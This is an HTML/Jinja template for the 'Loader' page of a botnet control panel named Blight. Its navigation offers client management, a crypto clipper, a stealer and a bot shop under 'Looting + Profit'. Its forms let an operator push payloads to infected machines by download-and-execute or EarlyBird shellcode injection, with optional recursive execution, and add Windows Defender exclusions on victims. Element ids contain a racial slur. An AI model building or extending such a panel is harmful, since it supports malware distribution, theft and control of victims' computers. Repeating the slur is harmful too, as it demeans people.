<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blight - Loader</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css">
    <link rel="stylesheet" href="{{ url_for('static',filename='css/style.css') }}">
</head>

<body>
    <div id="overlay"></div>
    <div class="container">
        <aside class="sidebar">
            <div class="logo">
                <img src="https://i.ibb.co/zVF2SSZ/image-removebg-preview-3.png">
                <h1 class="work-sans">Blight</h1>
            </div>
            <div class="sidebar-list-container">
                <ul>
                    <li><p class="work-sans-light">Client Managment</p></li>

                    <li><a href="clients" class="work-sans-normal sidebar-link"><i class="fas fa-user"></i>Clients</a></li>
                    <li class="active"><a href="loader" class="work-sans-normal sidebar-link"><i class="fas fa-upload"></i>Loader</a></li>

                    <li><p class="work-sans-light">Server Managment</p></li>

                    <li><a href="firewall" class="work-sans-normal sidebar-link"><i class="fas fa-ban"></i>Firewall</a></li>
                    <li><a href="server_logs" class="work-sans-normal sidebar-link"><i class="fas fa-code"></i>Server Logs</a></li>
                    <li><a href="settings" class="work-sans-normal sidebar-link"><i class="fas fa-cog"></i>Settings</a></li>

                    <li><p class="work-sans-light"> Looting + Profit</p></li>

                    <li><a href="clipper" class="work-sans-normal sidebar-link"><i class="fas fa-clipboard"></i>Clipper</a>
                    <li><a href="stealer" class="work-sans-normal sidebar-link"><i class="fas fa-mask"></i>Stealer</a></li>
                    <li><a href="botshop" class="work-sans-normal sidebar-link"><i class="fas fa-robot"></i>Botshop</a></li>
                </ul>
            </div>
        </aside>
        <main class="content">

            <div class="forms">

                <button onclick="openLightbox(0)" class="loadCreationButton">
                    <i class="fa-solid fa-file"></i>
                    Create Payload Load
                </button>

                <button onclick="openLightbox(1)" class="loadCreationButton">
                    <i class="fa-solid fa-plug"></i>
                    Create Plugin Load
                </button>
            </div>

            <div id="lightboxesContainer">

                <div class="lightbox">
                    <div class="forms">
                        <div class="form-container">
                            <button class="close-bttn" onclick="closeLightbox()">
                                <i class="fa-solid fa-angle-down"></i>
                            </button>
                            <h1 class="work-sans-light">Payload Execution</h1>
                            <hr>
                            <form action="#" method="post">
                                <label for="name">Execution Type</label>
                                <select name="execution_type">
                                    <option value="ANY | Download And Execute">ANY | Download And Execute</option>
                                    <option value=".BIN | EarlyBird Shellcode">.BIN | EarlyBird Shellcode</option>
                                </select>
                
                                <label for="message">Amount</label>
                                <input name="amount" type="number" placeholder="Out of 500, or blank for no limit">
        
                                <label for="message">Payload</label>
                                <input name="payload" type="file">

                                <input type="checkbox" id="vehicle1" name="is_recursive" value="1">
                                <label for="message">Enable recursive execution?</label>

                                <input id="nigga" type="submit" value="Submit">
                            </form>
                        </div>
                    </div>
                </div>
                


                <div class="lightbox"  id="secondLightbox">
                    <div class="forms">
                        <div class="form-container">
                            <button class="close-bttn" onclick="closeLightbox()">
                                <i class="fa-solid fa-angle-down"></i>
                            </button>
                            <h1 class="work-sans-light">Plugin Loading</h1>
                            <hr>
                            <form action="#" method="post">
                                <label for="name">Command Type</label>
                                <select name="Execution Type">
                                    <option value="nigga">Windows Defender Exclusion</option>
                                </select>
        
                                <label for="message">Description</label>
                                <textarea class="description_plugins" name="message"
                                    disabled>Only argument is a folder path. Cannot be a file path.</textarea>
        
                                <label for="message">Amount</label>
                                <input type="number" placeholder="Out of 500, or blank for no limit">
        
                                <label for="message">Arguments</label>
                                <input type="text">
        
                                <input id="nigga" type="submit" value="Submit">
                            </form>
                        </div>
                    </div>
                </div>
        
            </div>
                <table>
                    <thead>
                        <tr>
                            <th>Progress</th>
                            <tH>Load ID</tH>
                            <th>Recursive</th>
                            <th>Command Type</th>
                            <th>Command Arguments</th>
                            <th>Action</th>
                        </tr>
                    </thead>
                    <tbody>
                        {% for load in load_list %}
                        <tr>
                            <td>
                                <div class="progress-container">
                                    <div class="progress-bar" style="width: 50%;"></div>
                                </div>
                            </td>
                            <td>{{ load.load_id }}</td>
                            {% if load.recursive %}<td><i class="fa-solid fa-check"></i></td>{% endif %}
                            {% if not load.recursive %}<td><i class="fa-solid fa-xmark"></i></td>{% endif %}
                            <td>{{ load.cmd_type }}</td>
                            <td>{{ load.cmd_args }}</td>
                            <td>
                                <button class="remove-button" onclick="delete_load('{{ load.load_id }}')">
                                    <i class="fa-solid fa-trash"></i> Delete
                                </button>
                            </td>
                        </tr>
                        {% endfor %}
                    </tbody>
                </table>
        </main>
    </div>
    <script>

        function delete_load(load_id) {
            var url = new URL(window.location.href);
            
            var params = new URLSearchParams(url.search);
            
            params.set('delete_load', load_id);
            
            url.search = params.toString();
            
            document.location.href = url.toString();
        }


        var lightboxesContainer = document.getElementById("lightboxesContainer");
        var lightboxes = Array.from(lightboxesContainer.getElementsByClassName("lightbox"));

        for (let lightbox of lightboxes) {
            lightbox.style.opacity = "0";
            lightbox.style.pointerEvents = 'none';
            document.getElementById("overlay").style.opacity = "0";
        }

        function openLightbox(index) {
            lightboxes[index].style.opacity = "1";
            lightboxes[index].style.pointerEvents = 'auto';
            document.getElementById("overlay").style.opacity = ".7";
        }

        function closeLightbox() {
           for (let lightbox of lightboxes) {
             lightbox.style.opacity = "0";
             lightbox.style.pointerEvents = 'none';
             document.getElementById("overlay").style.opacity = "0";
           }
        }
    </script>
</body>

</html>